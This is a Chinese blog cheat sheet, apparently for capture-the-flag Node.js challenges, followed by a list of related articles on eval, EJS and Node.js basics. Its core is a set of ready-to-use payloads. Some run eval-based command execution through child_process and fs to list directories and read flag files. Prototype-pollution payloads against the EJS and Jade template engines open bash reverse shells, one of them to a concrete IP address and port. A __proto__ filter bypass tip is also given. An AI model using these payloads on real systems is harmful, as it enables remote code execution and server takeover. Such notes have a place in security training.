Nodejs笔记

最新推荐文章于 2024-01-06 18:06:54 发布
最新推荐文章于 2024-01-06 18:06:54 发布
阅读量222 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33814823/article/details/130867306
版权

Nodejs笔记

一、命令执行

?eval=require('child_process').execSync('ls').toString();
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).output;
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).stdout;
?eval=global.process.mainModule.constructor._load('child_process').exec('ls');
//文件操作
?eval=require('fs').readdirSync('.');
?eval=require('fs').readFileSync('fl001g.txt')

ejs引擎RCE payload

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"');var __tmp2"}}

jade rce payload

{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2333 0>&1\"')"}}}

nodejs 会把同名参数以数组的形式存储,并且 JSON.parse 可以正常解析34b26e479ce54df79f007fba54123da8

__proto__过滤:用constructor.prototype.outputFunctionName代替

otype.outputFunctionName`代替

ttycp3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFSHOW-nodejs
m0_74456293的博客
04-17 514
CTFSHOW-nodejs
如何使用EJS
thlzjfefe的博客
09-12 476
最近做的一个新项目,所以想着换一个新的模版引擎尝试一下。(之前我们一直在使用handlebars) 本次源码分析所使用的是TJ大神开发的1.x版本 当然现在该项目已经停止维护了,目前正在维护的是2.x版本 什么是EJS EJS是一个JavaScript模版库,用来将EJS模版结合着JSON数据转换为HTML 并且可以直接在模版中写JavaScript的语法 简单的示例 let template = '<h1>Hello, <%= name %></h1>' .
ejs默认配置 原型链污染
最新发布
rev1ve的博客
01-06 1180
我们已经知道当编译模板时,它会使用多个配置元素来处理模板中的代码片段,并将其转换为可执行的 JavaScript 函数。不过其中大多数都使用。因此,对于用户提供的对象来说情况并非如此,从 EJS 维护者的角度来看,用户向库提供的输入不是 EJS 的责任。所有这些都发生在最终被调用的 Template 类的编译函数中,在这种情况下,当创建模板对象时,将使用受感染的选项。路由下,接收GET参数并赋值给data变量,然后黑名单检测,调用ejs模板进行渲染其中解析data的json数据,说明ejs配置可控。
node-eval:直接评估节点require()模块的内容
05-09
评估-模块内容的require()! 概述 该模块是一种与require()相同的评估模块内容的简单方法,但无需从文件中加载它。 实际上,它模仿了javascript邪恶的eval函数,但改用了Node的VM模块。 好处 您为什么要在本机require使用eval模块? 在大多数情况下, require是可以的,但在某些情况下,我发现自己希望做到以下几点: 能够为模块提供上下文 能够从非节点标准位置加载模块文件 或者只是简单地利用JavaScript的eval但可以使用沙箱。 下载 它在节点程序包管理器(npm)上发布。 要安装,请执行以下操作: npm install eval 用法 var _eval = require ( 'eval' ) var res = _eval ( content /*, filename, scope, includeGlobals */ ) 提供
实现一个简单的服务自动重启
YancyCathy的博客
09-30 375
今天跟大家分享一个好用的技能 – 监听文件变化,自动重启服务 很多时候我们都会用到 webpack 中带的热更新插件来实现这个功能,接下来我们就来看下如何使用 node 原生的 api 来实现。 此法不一定适用于所有项目 ,需要根据实际项目来自行选择。 首先我们来看下需要用到的 模块和api 1. 需要用到的模块 fs 毫无疑问,想要监听文件变化,此模块是必不可少的。 path 此模块可以说跟 fs 狼狈为奸,我们可以使用此模块来获得任何我们想要的路径。 child_process 此模块可
Nodejs异步编程一——发布/订阅
eval的博客
02-24 1454
我们刚开始学习nodejs时难免会写出这样的代码,一旦嵌套过深,代码将变得很难维护var fs = require("fs") var path = require("path")// 原始函数 fs.readdir(path.normalize('/test'), function(err, files){ files.forEach(function(filename, index){
eval() python_Boa: 在 Node.js 中使用 Python
weixin_39855186的博客
11-25 136
作者 | Yorkie这次主要给大家带来一个好东西,它的主要用途就是能让大家在 Node.js 中使用 Python 的接口和函数。可能你看到这里会好奇,会疑惑,会不解,我 Node.js 大法那么好,干嘛要用 Python 呢?如果你之前尝试了解过一些机器学习的 JavaScript 的应用,就会比较清楚这背后的原因。现状是机器学习生态几乎是捆绑在 Python 这门语言在高速迭代着的...
Js 代替eval的方法
热门推荐
编程圈子-谢厂节的博客
09-01 1万+
function eval1 (str) { var script = document.createElement('script'); script.type="text/javascript"; script.text=str; document.getElementsByTagName('head')[0].appendChild(script); d
eval()函数
齐枫的博客
09-04 4150
eval()函数会将传入的字符串当做JavaScript代码进行执行。 语法Edit eval(string) 返回值 执行指定代码之后的返回值。如果返回值为空,返回undefined 描述Edit eval()是全局对象的一个函数属性。 eval()的参数是一个字符串。如果字符串表示的是表达式,eval()会对表达式进行求值。如果参数表示一个或多个JavaS
动态执行脚本
李刚的学习专栏
04-12 2311
提到动态执行脚本,大家想到的肯定是 eval 或 new Function(),在 nodejs 中有专属的 vm 模块,可以完成相应的 sandbox 作用。 浏览器中动态执行脚本 eval() 函数会将传入的字符串当做 JavaScript 代码进行执行,返回字符串中代码的返回值;如果参数不是字符串将原封不动返回。 如果你间接的使用 eval(),比如通过一个引用来调用它,而不是直接的调用 e...
【旧代码整理】Nodejs的另类用法
joyatonce 的博客
07-16 2677
Nodejs 的中文维基百科介绍:https://zh.wikipedia.org/wiki/Node.js Nodejs 可以 在linux命令行执行js代码。 比如: var a = 1; var b = 2; var c = a + b; console.log(c+"\r"); 以上代码保存为 test.js 然后执行命令: joyatonce@bananabook:~/# n
nodejs基础
weixin_43021174的博客
09-19 127
特点:单线程,非阻塞I/O,事件驱动 nodejs是一个js的执行环境 require表示引包,引包就是引用自己的一特殊功能 简单讲解http模块 const http = require('http'); http.createServer((req, res) =&amp;gt; { res.writeHead(200, { 'Content-Type': 'text/html;c...
nodejs入门必须知道的内容
woshinannan的专栏
05-07 1万+
Node.js简介nodejs并不是一门新的语言,与Java,php开发语言的平台也是不相同的,虽然他是JavaScript但是它并不是JavaScript的框架。nodejs是让JavaScript运行在服务器端的开发平台。当一种事务在一个领域独孤求败的时候就会想着进入另外一个领域,JavaScript已经在近几年已经一统的前端的江湖,所以已经开始进入服务端的领域。Node.js是基于Chrome
js eval替代方法学习笔记
guo8ke的专栏
04-28 1万+
写前端的小伙伴们都知道,js种eval()方法是用来把一段字符串转换成js代码并执行。但是eval执行效率非常差,并且容易造成作用于混乱。所以非常不提倡使用eval,甚至要避免使用。 但是在某些情况下这个功能却是必不可少的。同在csdn上 有一篇 js替代eval方法,作者写的非常好。下面就拿代码来学习一下。 第一种方法: function evil(str) {
js中eval() 方法的使用以及一些特殊的使用方式
heshan1992的博客
08-18 4727
1、eval方法只能在非严格模式中进行使用,在use strict中是不允许使用这个方法的。 2、eval函数接收一个参数s,如果s不是字符串,则直接返回s。否则执行s语句。如果s语句执行结果是一个值,则返回此值,否则返回undefined。 需要特别注意的是对象声明语法“{}”并不能返回一个值,需要用括号括起来才会返回值。如下:  var code1='"a" + 2'; //表达式 var
mongo-node 利用eval属性完成数据库的增删改(可以使用mongodb的原生语言,解决ID自增问题)
fyddaben的专栏
03-18 1365
警告:这种方式,如果用在用户交互数据中,容易被用于sql注入攻击,因此,一定要谨慎使用             以前做java的时候,用过mongodb一段时间,因此,非常想用mongodb的原生语句方式。即db.test.save.或者 db.test.update等来完成增删查改。            不用顾及node的使用的使用语法。今天查看api。终于发现了一个简单的属性ev
eval
前端菜鸟
07-30 1万+
eval() 函数计算 JavaScript 字符串,并把它作为脚本代码来执行。 如果参数是一个表达式,eval() 函数将执行表达式。如果参数是Javascript语句,eval()将执行 Javascript 语句。 console.log(eval(&quot;({a:1})&quot;)); //Object {a: 1} console.log(eval(&quot;{a:1}&quot;)); //1...
黑马nodejs笔记
08-12
抱歉,我无法回答你的问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Node.js最新版黑马配套笔记](https://blog.csdn.net/shenruiaaa/article/details/123554125)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人 黑马程序员Node.js学习笔记(一)](https://blog.csdn.net/qq_54022138/article/details/126700544)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值